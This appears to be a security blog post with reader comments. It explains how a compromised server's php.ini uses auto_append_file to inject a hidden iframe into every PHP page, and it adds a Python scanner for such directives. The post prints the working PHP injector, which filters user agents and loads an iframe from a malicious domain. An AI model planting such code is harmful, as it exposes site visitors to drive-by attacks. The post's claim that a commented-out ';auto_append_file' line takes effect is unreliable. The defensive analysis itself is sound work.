Is your site infected with malware, and you can't find it anywhere? It might be a good idea to search outside of your web directory and look in your main configuration files (especially if you are on a dedicated/VPS server).
We are seeing an increased number of sites infected with malicious iframes, similar to this one:
<style type="text/css">#doxig {width: 10px;height: 10px;frameborder: no;visibility: hidden;scrolling: no;}</style><iframe id="doxig" src="http://1306a95ajbr.liga4giurgiu.info/ad.jpg?2"></iframe>
These specific strings aren’t typically found anywhere in the website files, which is very concerning. We’re finding that entire servers are being compromised, and the main server php.ini file (/etc/php/php.ini) has the following setting added:
;auto_append_file = "0ff"
This simple line in the php.ini makes every PHP script append the output of the file 0ff (/tmp/0ff) to its own output. So even if your files look clean, the malware is still displayed to anyone visiting the site.
This is the code of the 0ff file:
<?php
// Inject only once per browser (tracked with a fake session cookie) and skip
// crawlers, Linux/Mac/mobile browsers, Opera Mini and Chrome, so the payload
// mostly reaches Internet Explorer/Firefox users on Windows.
if(!@isset($_COOKIE['PHPSESS1D']) &&
   !@preg_match('/; Yandex|; Googlebot|linux|macintosh|android|Symbian|iPhone|Mac OS|Opera Mini|Chrome|Apple/i', $_SERVER['HTTP_USER_AGENT'])) {
    // Set the marker cookie for one day so the iframe is served only once.
    echo '<script type="text/javascript">
d=new Date();
d.setDate(d.getDate()+1);
document.cookie="PHPSESS1D=1; path=/; expires=" + d.toGMTString();
</script>';
    // Hidden 10x10 iframe pointing at the attacker's landing page.
    echo '<style type="text/css">#doxig {width: 10px;height: 10px;frameborder: no;visibility: hidden;scrolling: no;}</style><iframe id="doxig" src="http://1306a95ajbr.liga4giurgiu.info/ad.jpg?2"></iframe>';
}
So if you are seeing those hidden iframes and the website files look clean, check your PHP and main Apache configurations as well.
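As an added example (not part of the original post or a Sucuri tool), here is a small script that scans php.ini text for auto_append_file and auto_prepend_file directives. It reports active entries as well as ones commented out with ';', since a stray copy of such a line is still a sign that someone has edited the file; the php.ini fragment it runs on is constructed for the demo.

```python
import re
import sys

# Matches e.g.  auto_append_file = "0ff"  or  ;auto_append_file = "0ff"
# (a leading ';' is an ini comment, so PHP ignores that line).
_DIRECTIVE_RE = re.compile(
    r'^\s*(?P<comment>;\s*)?(?P<name>auto_(?:append|prepend)_file)'
    r'\s*=\s*(?P<value>.*?)\s*$',
    re.IGNORECASE,
)

# Constructed php.ini fragment for demonstration; not from a real server.
SAMPLE_PHP_INI = """\
; constructed sample php.ini fragment
[PHP]
engine = On
auto_prepend_file =
;auto_append_file = "0ff"
auto_append_file = "/tmp/0ff"
include_path = ".:/usr/share/php"
"""


def find_auto_file_directives(ini_text):
    """Return (line_no, directive, value, active) for every non-empty
    auto_append_file / auto_prepend_file line. 'active' is False when the
    line is commented out. An empty value is PHP's default and is skipped."""
    findings = []
    for line_no, line in enumerate(ini_text.splitlines(), start=1):
        m = _DIRECTIVE_RE.match(line)
        if not m:
            continue
        value = m.group("value").strip().strip('"\'')
        if not value:
            continue
        active = m.group("comment") is None
        findings.append((line_no, m.group("name").lower(), value, active))
    return findings


def active_injections(ini_text):
    """Only the values PHP will actually load, i.e. uncommented directives."""
    return [v for _, _, v, active in find_auto_file_directives(ini_text) if active]


if __name__ == "__main__":
    # Usage: python check_php_ini.py /etc/php/php.ini [more ini files...]
    for path in sys.argv[1:] or ["<sample>"]:
        text = SAMPLE_PHP_INI if path == "<sample>" else open(path).read()
        for line_no, name, value, active in find_auto_file_directives(text):
            state = "ACTIVE" if active else "commented"
            print(f"{path}:{line_no}: {name} = {value!r} ({state})")
```

Run it against every file that `php --ini` lists, since the php.ini PHP actually loads is not always /etc/php/php.ini.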
Need help with malware? Need someone to clean your site? Sign up here: Sucuri
Yeah lol, a "vulnerability" that is a legitimate and documented directive of PHP... If you leave your php.ini unprotected, it's really your own fault, not PHP's...
Anyway it's a bad idea, most distros around empty /tmp at boot by default. It will get deleted just by rebooting.
How is the php.ini being modified? Are you finding this happening in setups with incorrect permissions, are they being uploaded, or is another vulnerability being exploited?